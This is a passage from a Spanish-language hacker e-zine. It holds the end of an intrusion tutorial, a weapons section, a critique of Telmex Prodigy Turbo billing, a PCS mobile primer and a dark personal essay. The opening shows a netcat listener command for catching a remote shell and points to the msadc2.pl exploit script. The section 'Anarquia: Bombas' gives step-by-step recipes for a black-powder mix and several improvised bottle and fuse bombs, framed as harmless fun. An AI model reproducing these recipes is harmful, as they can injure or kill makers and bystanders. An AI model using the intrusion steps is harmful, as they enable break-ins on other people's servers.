c:\0x90_tools\wintendo>nc -vvn -l -p 8080 Listening on (Any) on port 8080
C:\>
CHINGAS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Bueno que tal???? les gusto la teinica??? ahora puedes ir a contarle a tus amigos que s0d owns ya biatch!!!! recuerden tha crew is ahead, tha s0d crew.Recuerden visiten www.s0d.org y www.raza-mexicana.org seguido para ver mas articulos y programas ....
nc.exe puede ser encontrado en: www.l0pht.com msadc2.pl puede ser econtrado en www.wiretrip.com active perl puede ser encontrado en www.activestate.com
byt3z biatch!!!!!!!!!!!!!!!!
0x90
-11--( Anarquia: Bombas )---------------------------------------------------------------------------------------------------------------------------------------------RM-10] -----[ psiconauta ]----------------------------------------------------------------------------------------------------------------------------[psiconauta2k@yahoo.com]
Este articulo es parte del documento "Getting r00t 2k" que puede encontrarse en mi pagina web -> http://psicocity.cjb.net/. Ni el autor ni esta revista se hacen cargo de las responsabilidad y de los da~os causados con la informacion aqui expuesta.
COMO CREAR BOMBAS
----------------------------------- > Polvora Materiales: Nitrato de Potasio Carbon Vegetal Azufre
- Fabricacion: 6 Partes de Nitrato de Potasio 2 Partes de Carbon Vegetal 1 Parte de Azufre
----------------------------------- > Bomba de Carbonato Materiales: Botella de Coca-Cola de 2 Litros Carbonato de Calcio Agua
- Fabricacion: Pon de 500 a 800ml de agua en la botella y adiciona rapidamente piedritas de CARBONATO DE CALCIO O CARBURO (es facilmente encontrado en ferreterias ya que se usa para el gas de la soldadora autogena). La botella rapidamente explotara dejando salir el gas, pero si se necesita una explosion mejor se puede colocar a un lado de la botella cerrada una vela o algo que tenga f uego, entonces cuando se produsca la explocion el gas ardera produciendo una enorme bola de fuego.
-----------------------------------
> Bomba de Hielo Seco Materiales: Botella de Coca-Cola de 2 Litros Hielo Seco Agua
- Fabricacion: Recomiendo esta bomba ya que es facil conseguir los materiales y es muy divertida, colocar en la botella de coca cola de 2l bastante hielo seco y luego a~adir rapidamente agua, obiamente tapar la botella y correr ya que rapidamente el gas producido por el hielo seco explotara y destruira la botella.
-----------------------------------
> Bomba de Cloro Materiales: Botella de Coca-Cola de 2 Litros Cloro Granulado Alcohol Comun
- Fabricacion: Ponga 200ml de alcohol en la botella y luego deposite 150 gramos de cloro, tape la botella y agitela bien luego corra, la mezcla estallara en 2 o 5 minutos, es recomendada para hacer mucho ruido.
-----------------------------------
> Bola de Tenis Bomba Materiales: Pelotita de Tenis Una mecha de Hilo con Alcohol Muchas Cabecitas de Fosforo
- Fabricacion: Hace un peque~o corte en la pelota y llenala con cabezas de fosforo que puedes cortar con un alicate luego cerra la pelota con cinta adesiva preferentemente tiene que quedar bien fuerte dejando un ahugero para una mecha de hilo ba~ado en alcohol de quemar, bueno luego lo unico que tienes que hacer es prender la mecha esperar a que explote, es divertido pero tambien te puedes ingeniar para hacerlo con otros objetos como un tubo de camara de fotos una virome.
> Bomba de Bicarbonato Materiales: 1 Tubo de donde vienen los rollos de fotos 1 Paquete peque~o de Bicarbonato de Sodio 1 Poco de Vinagre Blanco
-Fabricacion: Recomiendo esta bomba para hacer cagar a al algun amigo ya que el bicarbonato se consigue en la farmacia y es de venta al publico si ninguna orden de por medio. Lo que se debe hacer es poner bicarbonato de sodio en un papel fino y luego envolverlo, ponerlo en el fondo de tubo de fotos, rapidamente llenar el tubo c on vinagre y cerrarlo, nos dara 1 o 2 minutos para ponerlo en donde queramos y alejarnos ya que al juntarse el bicarbonato con el vinagre se forma un gas y una espuma que haran explotar el tubo de fotos. Es muy divertido pero inofensivo.
-12-( Prodigy Turbo: Los Costos Escondidos )---------------------------------------------------------------------------------------------------------------RM-10] -----[ KUMA ]-------------------------------------------------------------------------------------------------------------------------------------[hackersp@uol.com.mx]
Prodigy Turbo: Los Costos Escondidos. Sacado de internet por: KU|V|A
Fuente: E-BASE
En el Distrito Federal ha causado revuelo el lanza miento del servicio de Telmex denominado Turbo Prodigy, el cual es anunciado como un servicio tipo ISDN, tecnologia que ha sido utilizada en Estados Unidos desde hace mas de 5 a~os que incorpora los servicios de voz y datos en una sola linea telefonica. Este es el primer paso de la compa~ia de Carlos Slim para establecer su estrategia de controlar en nuestro pais los denominados servicios de banda ancha, que permiten, entre otras cosas, conexiones de alta velocidad a Internet.
Segun la informacion que proporciona Telmex al respecto del Turbo Prodigy, se~ala que este tipo de lineas pueden soportar velocidades de 128 kbps en sus conexiones a Internet, ademas se pueden enviar y recibir llamadas mientras se esta conectado a la red, todo esto con solo cerca de mil pesos para cambiar una linea analoga actual por la de Turbo Prodigy, con una renta mensual un poco arriba de 750 pesos y con derecho a 200 llamadas sin costo en el plan residencial. Hasta aqui todo pareceria un sue~o que, de hecho, ha conquistado a una considerable audiencia en la ciudad de Mexico, en donde la demanda del servicio a una semana de su lanzamiento ha rebasado todas las expectativas, sin embargo analizando friamente los costos –escondidos- del servicio, la realidad es otra muy distinta.
Vera usted, si bien es cierto que Telmex solo le cobrara por evento ( por llamada) y que le regala 200 en el plan residencial, el problema es que no le dicen que cada conexion que haga a Internet a los supuestos 128 kbps. anuncia dos, le va a generar no una sino, dos llamadas!, ya que el servicio, que aparte no esverdadero ISDN, se presta mediante 2 lineas separadas, cada una con una capacidad aproximada de 64 kbps., usandose una para transmitir datos y la otra para recibir, lo que que hace que no sea muy exacto eso de los 128 kbps efectivos que anuncia la compa~ia, ya que en este caso serian 64 kbps full duplex en realidad.
Para ejemplificar esto me remito al chiste del politicoque declara en su informe de gobierno - se han construido 10,000 kms de carretera, 5,000 de ida y 5,000 de vuelta-
Volviendo al servicio medido que genera el Turbo prodigy, una vez que usted genero 2 llamadas con su conexion, si en ese momento recibe una llamada, el servicio de Internet se baja a 64 kbps, o sea se desconecta uno de los 2 canales para dar entrada a la llamada de voz, pero una vez concluida, al subir nuevamente la velocidad a 128 kbps, o sea utilizar los 2 canales, usted genera otra llamada!, asi por cada vez que reciba llamadas mientras esta conectado, al terminar esta y volver la velocidad a 128 kps, se generaran nuevas llamadas, aumentando su servicio medido, esto sin contar con las llamadas que usted mismo tenga que hacer, en donde el chiste le sale peor.
A este ritmo de servicio medido, es muy probable que las famosas 200 llamadas no le duren - ni para el arranque- por lo que usted debera estar dispuesto a pagar 1.40 por cada llamada adicional en este regimen de llamadas triples, cuadruples y quintuples por conexion, por lo que las personas que ahora estan contratando gustosamente este servicio de Telmex, van a enfrentarse a la -negra- realidad cuando les llegue su recibo telefonico, el cual debera andar en el rango de los miles de pesos por mes.
Por otro lado, mucho se critica en el medio la velocidad real de este servicio, ya que aunque la velocidad de conexion entre el cliente y Telmex sea alta, para todos es sabido el cuello de botella que tiene la compa~ia en su enlace agregado a Internet, lo que lo hace extremadamente lento usando acceso telefonico, no digamos ahora que van a incorporar a miles de usuarios mas pero a 128 kbps.
La cuestion, una vez mas, es que Telmex sigue aprovechandose de enormes campa~as publicitarias para vender sus servicios de mediocre calidad y ocultandole importante informacion a sus usuarios.
-13-( Personal Communications Services )---------------------------------------------------------------------------------------------------------------------RM-10] -----[ Yo_Soy ]-----------------------------------------------------------------------------------------------------------------------------[yo_soy@raza-mexicana.org]
Este documento habla sobre los sistemas PCS o Servicios de Comunicacion Personal en espa~ol, supongo que has oido Telcel - Digital PCS, pues este articulo pretende dar una introduccion a este sistema de manera que puedas entender mas sobre el.
Los sistemas de telefonia movil son en gran parte, comunicaciones via radio, solo que en rangos de frecuencia mas amplios y por lo tanto, proveen mas canales para realizar comunicaciones. Los sistemas de telefonia movil utilizan una red de peque~as estaciones de antenas que proveen cobertura a ciertas areas geograficas, llamadas celulas (notese que la "celula" no son las antenas, sino las areas a las cuales dan cobertura), las llamadas de la celula son manejadas por estaciones base (BS por sus siglas en ingles, Base Station) o switches moviles (MS - Mobile Switches).
Lo mas importante pude ser que los sistemas PCS comenzaron a ser digitales, creando una nueva red. PCS comenzo a funcionar en los Estados Unidos a mediados de 1990 como otra opcion en telefonia movil y posiblemente como una mejora a la telefonia celular.
PCS se encuentra por arriba de las frecuencias de la telefonia celular normal (800 Mhz) mayor poder y mayores celulas de menor tama~o, las frecuencias seran discutidas mas adelante, por lo tanto cuando hablamos de PCS nos referimos a servicios de frecuancia alta.
El PCS se divide en dos tipos: Narrowband y Broadband.Narrowband se hace cargo de los datos y Broadband se hace cargo de la voz, Narrowband utiliza generalmente frecuencias de 900 Mhz para sistemas de envios de mensajes, mientras que Broadband utiliza frecuencias de 2 Ghz para transmision de voz, datos y video.
PCS se divide en 5 sistemas principalmente:
PCS1900 Upbanded GSM cellular
TIA IS-136 Upbanded TDMA digital cellular
TIA IS-95 Upbanded CDMA digital cellular
TIA IS-88 Upbanded NAMPS narrowband analog cellular
TIA IS-91 Upbanded Plain old analog cellular
Upbanded significa un servicio que opera a una frecuencia mas alta de la que normalmente lo haria. Como puedes ver son sistemas de radio-celular solo que en frecuencias mas altas, la diferencia esta en los detalles, pero en si no es mas que celular radio. Mas en el proximo numero...
-14-( Oda a una vida )---------------------------------------------------------------------------------------------------------------------------------------------------RM-10] -----[ Fatal ]--------------------------------------------------------------------------------------------------------------------------------------[fatal@raza-mexicana.org]
Oda a una vida.
"Quien soy? Para que estoy aqui? Quien me quiere, comprende o me ama? Porque sigo con vida? Vale la pena vivir de este modo?"
Esa clase de preguntas siempre deambulan en nuestra mente, cuando tenemos el rostro apuntando hacia el monitor la vista fija a la nada aunque podamos percibir el rapido refresh de 75hz, el quedo silbido del aire siendo expulsado por el ventilador del CPU, el tiempo exacto que tarda en parpadear el cursor, oir los ultimos segundos de la cancion numero 214 en nuestro extenso playlist de miles de mp3's que emite una diadema remachada yaciendo en nuestro cuello y que la barra de download en progreso del nuevo sistema operativo que nos dispusimos a bajar cuando aun habia luz natural en este lado del planeta solo le restan 18 horas mas para terminar... es ahi, cuando entramos a un estado de total conciencia mental y completa inconsciencia corporea, nos damos cuenta de cuan denso es el aire que inunda la habitacion después de haberse extinguido en el borde de la mesa el dieciochoavo cigarrillo al cual solo tuvimos tiempo de aspirar 2 bocanadas de el, las capas de suciedad acumulada en 2½ dias de desaseo son una gruesa costra de suciedad y sudor embarradas en la piel, nuestro suministro de estimulante legal en una jarra Pirex yace encima de una pila de discos, aun contiene cafe barato con una dosis de cucharadas que podria considerarse ilegal diluidas en agua de la llave, suficiente para un ultimo sorbo que podria mantener los sistemas mas basicos de nuestro organismo activos por un par de horas mas, vemos con desgano que el unico placer liquido que nos permite alejarnos de la dulce amargura de la cafeina y la agria y reconfortante sensacion de nicotina en nuestra boca; la coca, aun tiene de liquido en el envase de 2 litros, despues de 1 dia a la intemperie carece de su condicion gaseosa y su sabor dista mucho de algo placentero, pero en este instante podriamos consumir petroleo si nos quitara esa sensacion de resequedad buco-faringea, la misma emocion recorre nuestro cerebro cuando vemos una charola rebosante de comida fria, magra y llena de peque¤os insectos deleitandose del banquete que aun tratamos de recordar si nos fue llevada por familiar, amigo, enemigo o si fuimos. nosotros los que preparamos ese alimento que solo pudimos disfrutar 1 minuto para despues ser una parte mas de la decoracion de ese espacio de 4.5x 3 metros al cual solemos llamar habitacion y cuando parece que estamos a punto de perder la conciencia de nuestro mundo, los sentidos se agudizan y percibimos con total sentimos el calor entre los dedos indice y medio del penultimo cigarrillo disponible aun cuando no recordamos el momento en el que lo encendimos, la pletoria de olores que alcanzamos a olfatear se colocan en un punto medio entre lo fetido y lo etereo, los 3 inciensos que estan combustiendose con aroma a bosque poco pueden hacer para disimular tal hedor con el que aprendimos a vivir, la vista se nubla entre una composta de gases turbios y polvo, los ojos se entrecierran, tratamos de no ceder al peso de los parpados, es una tarea facil despues de estar 57 horas sin darle un descanso a nuestro cuerpo, parece que despues de todo podriamos tomarnos un minuto para descansar el cuerpo, es una lastima que nuestra mente este siempre activa, al tener los ojos cerrados rogamos que por obra divina todo desaparezca de nuestro entorno y de nuestra mente pero ante nuestros ojos nos deslumbran las respuestas de tales interrogantes que siempre nos persiguen:
"No soy nadie. No tengo oficio ni beneficio. No tengo un ser amado al cual
pueda expresarle mi dolor y amor. No tengo vida real. No tengo vida en si..."
Haber llegado a tales conjeturas serian motivo suficiente para que cualquier persona cuerda se diera un balazo en la cien y asi terminar con ese misero panorama. Una descarga electrica sale de nuestra espina dorsal y recorre todo el cuerpo, sin siquiera razonarlo abrimos los ojos, nos levantamos del asiento, damos una rapida sacudida a la cabeza, nos despojamos de las ataduras que nos unen a esa masa metalica inerte, salimos despavoridos de la habitacion evadiendo de 2 saltos la mara¤a de cables, y porquerias que se encuentran esparcidas en el piso de la habitacion, de un golpe abrimos la puerta, volteamos la mirada hacia la izquierda y en milesimas de segundo corregimos el camino y corremos hacia la derecha sin rumbo fijo, nuestra mente esta en blanco, vemos siluetas sin volumen, escuchamos ruidos diversos que se alejan a cada zancada de nuestro andar, la percepcion del tiempo y espacio es nula, nada existe despues de esa rafaga de impulsos nerviosos, sentimos una fatiga corporal intensa, los musculos distendidos piden parar pero nuestra mente no puede dar esa orden por mas que la razon lo pida, de pronto sentimos otro shock, esta vez directo al cerebro, en vilo detenemos el paso... recobramos la conciencia, nos damos 10 segundos para parpadear, respirar 5 veces y tratar de fijar la vista en un lugar. Transcurridos esos 10 segundos las piernas se vencen ante el esfuerzo fisico tan grande, caemos de espaldas al suelo, nos toma 30 segundos para encontrar una respuesta al porque corriamos afanosamente, aun no podemos fijar una respuesta, ante nuestros ojos pasan miles de lineas de codigo, informacion imagenes, colores, palabras sin sentido, pero ninguna de ellas puede responder a nuestra interrogante este evento solo tomo 3 segundos. Extendemos las manos para observarlas detenidamente, no nos concentramos en ver cuan sucias y maltratadas estan, solo la forma de ellas, las giramos y movemos los dedos para asegurarnos que en verdad son nuestras, se siente una estela blanca fulgurante ardiendo en nuestros ojos, tratamos de limpiarlos o de apaciguar tal ardor con nuestras manos, al terminar de tallar los ojos, la nariz no se puede dar abasto para inhalar y exhalar aire, mojamos los labios y abrimos la boca de par en par con el unico fin de tomar una bocanada de aire que nos sabe a vida, una tenue brisa sopla en nuestro rostro, la sentimos refrescante y pura, los cabellos caen directo en la cara y se mueven al unisono en un compas en intervalos de 1 segundo. Los pensamientos se aclaran despues de permanecer unos minutos en el cesped, cosa que nos sorprende ya que tal travesia nos condujo a un parque publico a 3 kilometros de distancia de nuestro punto de partida, empezamos a sentir el cuerpo mas ligero y estable, el tacto es mas seguro, el oido ya no distorsiona el tiempo y sonido que envuelve el jardin, el oxigeno que respiramos carece de cualidades de algun aroma en particular, es puro y claro y sentimos que recorre cada molecula de nuestro interior y la vista puede distinguir con nitidez colores, formas y objetos, nos incorporamos del suelo y vemos como un grupo reducido de transeuntes nos observa con curiosidad, parece ser que la escena que protagonizamos les causo un enigma indescifrable, volteamos la mirada al cielo, aun queda un poco de brisa en el ambiente, solo podemos cerrar los ojos en un parpadeo lento y dibujar una ligera sonrisa, la paz y felicidad que invade nuestro ser es gigantesca, tanto como para reir a carcajadas o ensanchar una sonrisa burlona de oreja a oreja, pero con una mueca tan falaz solo nos enga¤ariamos, en ese momento de plena felicidad sentimos que el mundo es vasto, infinito y es solo nuestro.
Si se chutaron toda estas lineas talvez sigan con cara de "juat". Que nos mantiene vivos despues de toparnos con ese punto sin retorno? El saber lo que somos, el reconocer quienes somos, la total concordancia del porque tomamos este camino tan turbio y decadente, el aceptarnos a nosotros y a nuestra realidad y la sed de conocimientos; motor basico de nuestras vidas. Este mundo tiene mas pro´s que contras, uno de ellos es la sociedad, en la cual descubrimos una cultura propia, una identidad, amistades, enemigos, vicios y personas con intereses afines.
Esta es la primera parte de muchas vidas por explicar, esta fue una de tantas historias que vemos a diario en el sub-suelo...
[ Arriba ] [ Pagina Siguiente ]